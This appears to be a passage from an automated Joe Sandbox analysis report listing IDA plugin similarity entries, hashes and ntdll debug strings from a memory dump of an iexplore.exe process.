                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: fc06a42f6f6432d77ab4bc52864f67706a7e45a7709aa7204d9de0cc74a8c43f
                                                                                                                                                                              • Instruction ID: a3e9abb57e2af43b1371449f2f23eabb0516d9ef3f6ee7939fa6bf0280c5da26
                                                                                                                                                                              • Opcode Fuzzy Hash: fc06a42f6f6432d77ab4bc52864f67706a7e45a7709aa7204d9de0cc74a8c43f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E9002A5211554924500F2588404B0A451587E0201B55C016E2054560CC62589919135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                                                                                                                                              • Instruction ID: 4aa041df233e0283477c31b896e3148914c89d9dedc8a0f5884b536371326aab
                                                                                                                                                                              • Opcode Fuzzy Hash: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                                                                                                                                              • Instruction Fuzzy Hash: FE900229231414020145F558060450B045597D6351395C015F2416590CC72189A55321
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                                                                                                                                              • Instruction ID: ab87efea4485dfc199705ccf851009ffafc09bca01f757f34846777fc1abf054
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                                                                                                                                              • Instruction Fuzzy Hash: E890043D331414030105F55C07045070057C7D5351355C031F3015550CD731CDF15131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                                                                                                                                              • Instruction ID: 16c2c80118fbf208e03a801c5707bc193d1c122dbd2bf868395471aad8c36b83
                                                                                                                                                                              • Opcode Fuzzy Hash: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                                                                                                                                              • Instruction Fuzzy Hash: 5690022525546502D150B15C44046164015A7E0201F55C021A1814594D865589956221
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                                                                                                                                              • Instruction ID: 3f0b657a2463e81921aee61bcd4cb68efe001bf08b02c3d6dfcb387c4736c0b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                                                                                                                                              • Instruction Fuzzy Hash: CF90026535141842D100B1584414B060015C7E1301F55C015E2064554D8719CD926126
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0f8bd522b5bd2a69eaf154ab3bcdcb0130b83fc2da03e2ab55ac6ed13a93dabf
                                                                                                                                                                              • Instruction ID: 137c0d3c1a8f56bbd49d7957fc8b4b80c1790433f5e91cce57ebd4ccda559034
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8bd522b5bd2a69eaf154ab3bcdcb0130b83fc2da03e2ab55ac6ed13a93dabf
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C90047533141443D104F15C44047070055C7F1301F55C013F3154554CC73DCDF15135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b6314ddd15f0cba431f72c0cec689e3b6cb35d572a614d621ac2ffa5b43d7396
                                                                                                                                                                              • Instruction ID: cfc48eae67ecb50effa204cf7fd57dfaa701b463042fb1108e4cbd7d49780eae
                                                                                                                                                                              • Opcode Fuzzy Hash: b6314ddd15f0cba431f72c0cec689e3b6cb35d572a614d621ac2ffa5b43d7396
                                                                                                                                                                              • Instruction Fuzzy Hash: F990023521181802D100B1584808747001587D0302F55C011A6164555E8765C9D16531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                                                                                                                                              • Instruction ID: 0499f5329f231d21c61179efc6bdbf3d2676c99cdc994fb43219c1329666a8bc
                                                                                                                                                                              • Opcode Fuzzy Hash: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                                                                                                                                              • Instruction Fuzzy Hash: 07900225611414424140B16888449064015ABE1211755C121A1998550D865989A55665
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c6dcbb855101954db33d692e71260753738db5e29d43a20cdef66b18f979cff2
                                                                                                                                                                              • Instruction ID: bcd499e33ff038c2dfdd630fb72bda4549c0ae328f42702ad934be91e10267ba
                                                                                                                                                                              • Opcode Fuzzy Hash: c6dcbb855101954db33d692e71260753738db5e29d43a20cdef66b18f979cff2
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E90023521181802D100B158481470B001587D0302F55C011A2164555D872589916571
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                                                                                                                                              • Instruction ID: a690e302b6ca4ffc36c28902edbe7d04e3703708f480cc5e460d567d9910e443
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                                                                                                                                              • Instruction Fuzzy Hash: F3900225221C1442D200B5684C14B07001587D0303F55C115A1154554CCA1589A15521
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 21dc18fb68077f0f5ec916551e5151c438921cd8617ace2411f3a7ee9d9a71dc
                                                                                                                                                                              • Instruction ID: 5d8f649d29bcc62f1c426629806671189f326a83e8e7e2f7ec56ccac23b4e61a
                                                                                                                                                                              • Opcode Fuzzy Hash: 21dc18fb68077f0f5ec916551e5151c438921cd8617ace2411f3a7ee9d9a71dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 7D90022531141802D102B15844146060019C7D1345F95C012E2424555D87258A93A132
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6301115c12e5e3a87e1bde74b88c4712729c5cb75be1835a2713422e97c02d80
                                                                                                                                                                              • Instruction ID: f9f0a797c6c9dd649fc9c554d26f141fc62dbdfe2003d40c74806d0e75de0838
                                                                                                                                                                              • Opcode Fuzzy Hash: 6301115c12e5e3a87e1bde74b88c4712729c5cb75be1835a2713422e97c02d80
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C90027521141802D140B1584404746001587D0301F55C011A6064554E87598ED56665
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                                                                                                                                              • Instruction ID: 64397727308088e09c81ad56c401e05d773adfd3a9ee482a1eb47ced0d3d8982
                                                                                                                                                                              • Opcode Fuzzy Hash: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                                                                                                                                              • Instruction Fuzzy Hash: BE90022561141902D101B1584404616001A87D0241F95C022A2024555ECB258AD2A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                                                                                                                                              • Instruction ID: f7269772387fa3bd0531b57ecbad56f36624e1c1dc49091b913b0a74093dc665
                                                                                                                                                                              • Opcode Fuzzy Hash: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                                                                                                                                              • Instruction Fuzzy Hash: 1390026521181803D140B5584804607001587D0302F55C011A3064555E8B298D916135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                                                                                                                                              • Instruction ID: 2f1675733d133693df72ab1d2d4c045e017f21d82db2819293bfc6aa5f1b4a12
                                                                                                                                                                              • Opcode Fuzzy Hash: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                                                                                                                                              • Instruction Fuzzy Hash: AC90043531141403D140F15C541C7074015D7F1301F55D011F1414554CDF15CDD75333
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 604f3a98d0364ce809a360545588ddab50445ada7298b3ad7a0148039443d676
                                                                                                                                                                              • Instruction ID: 45ffb5c80df7f5a99848033b39c03eecac67835a6c075c457e17f392802ada9f
                                                                                                                                                                              • Opcode Fuzzy Hash: 604f3a98d0364ce809a360545588ddab50445ada7298b3ad7a0148039443d676
                                                                                                                                                                              • Instruction Fuzzy Hash: B490022521545842D100B5585408A06001587D0205F55D011A2064595DC7358991A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2aab016d322483a4864951f0369ee8298aa9caec72384766c367dcd5c9444431
                                                                                                                                                                              • Instruction ID: 48aa507eddd71f604cd01638da484684e3236d5a4eee04b9e4ad21e9854ad3f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 2aab016d322483a4864951f0369ee8298aa9caec72384766c367dcd5c9444431
                                                                                                                                                                              • Instruction Fuzzy Hash: BC900235212415429540B2585804A4E411587E1302B95D415A1015554CCA1489A15221
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                                                                                                                                              • Instruction ID: db049098ca062a2bcea82e95d885c584bb1f4a45220b9e44f18c0651546df5d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                                                                                                                                              • Instruction Fuzzy Hash: DA90022D22341402D180B158540860A001587D1202F95D415A1015558CCA1589A95321
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5f626cec17d05a1953ac04764b422ec92a3072636edfe5e8ddaca3feb7be65c6
                                                                                                                                                                              • Instruction ID: 9982c5acf852d5c07de393dbfaa96889442d15cf519ac4d535d3689a252e55e5
                                                                                                                                                                              • Opcode Fuzzy Hash: 5f626cec17d05a1953ac04764b422ec92a3072636edfe5e8ddaca3feb7be65c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 0490023921141802D510B1585804646005687D0301F55D411A1424558D875489E1A121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 24d6f8d514728a6ef358676e632f88e16342afabc9efdb67ac9cf227d7aaeed1
                                                                                                                                                                              • Instruction ID: 8ed4c37aa4b4259029f8035236887a34af04aa091b936c722c40532d3e519c26
                                                                                                                                                                              • Opcode Fuzzy Hash: 24d6f8d514728a6ef358676e632f88e16342afabc9efdb67ac9cf227d7aaeed1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B90023525141802D141B1584404606001997D0241F95C012A1424554E87558B96AA61
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                              • Opcode ID: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                                                                                                                                              • Instruction ID: 5dd81b47c92b7d01faec2a3bc89d8580878746c7aad80b91430ac9947cdf1fc4
                                                                                                                                                                              • Opcode Fuzzy Hash: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                                                                                                                                              • Instruction Fuzzy Hash: B551A7B6A30256BFCF10DB98989097EF7B8BB08201B14C76DE569D7641D674DE808BE0
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 032F4787
                                                                                                                                                                              • Execute=1, xrefs: 032F4713
                                                                                                                                                                              • ExecuteOptions, xrefs: 032F46A0
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032F4742
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032F4655
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032F46FC
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032F4725
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                                              • Opcode ID: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                                                                                                                                              • Instruction ID: be2d407606837f1269d94fc6da4c07cde34421379d64f8d72250ceaf9151c395
                                                                                                                                                                              • Opcode Fuzzy Hash: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E510835A203196FDF24EAA9DC95FEEB3BCAF44344F0401A9D505AB191D7B0AAC58F50
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: 567e1f4c075c75283a4ad1cfa9192390a832ee389863b7b6fb41c29169243ddb
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81BC35E752CA9ADF24CE68C8927AEBBA5AF45310F2C435DD861A73D0C77488C0CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032F02E7
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032F02BD
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                                                                                                                                              • Instruction ID: 58efd630fb05af1bcc32f007bc3083ea86c563cf8b67fb8e5904b8840e58c522
                                                                                                                                                                              • Opcode Fuzzy Hash: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                                                                                                                                              • Instruction Fuzzy Hash: 73E1C030624B42AFD725CF28CD84B2AF7E4BB44714F184A6DF5A58B2D1D778D884CB52
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 032F7B8E
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F7BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032F7B7F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                                                                                                                                              • Instruction ID: e4d12beaf6702569a057715d086c66316c60b022cf465df8a7f599d841dceebb
                                                                                                                                                                              • Opcode Fuzzy Hash: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A4102357247039FD724CE29C840BAAB7E5EF89750F040A2DF95ADB680DB71E485CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032F728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 032F72A3
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F72C1
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032F7294
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                                                                                                                                              • Instruction ID: 7226b7e9b6c73ea47a823989dd11242f212c42bb4f3433d4ecceb7bf7599888e
                                                                                                                                                                              • Opcode Fuzzy Hash: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                                                                                                                                              • Instruction Fuzzy Hash: 5041D035620306AFD720DE29CC91FAAF7B5FF44750F140629F955AB280DB71E89287D1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: e433928fb85c575db7e46b6696d397f4e021218ed7b05b832585b09b1fae339b
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F91A071E3029A9EDB24DE6DC8906BEB7A5BF44320F18875EE865A72C0D77089C18F50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                                                                                                                                              • Instruction ID: e92c06eeea0575e571cff4ecb5fedd3fe6d3ee8e4ee0d54ef06be1877df612c0
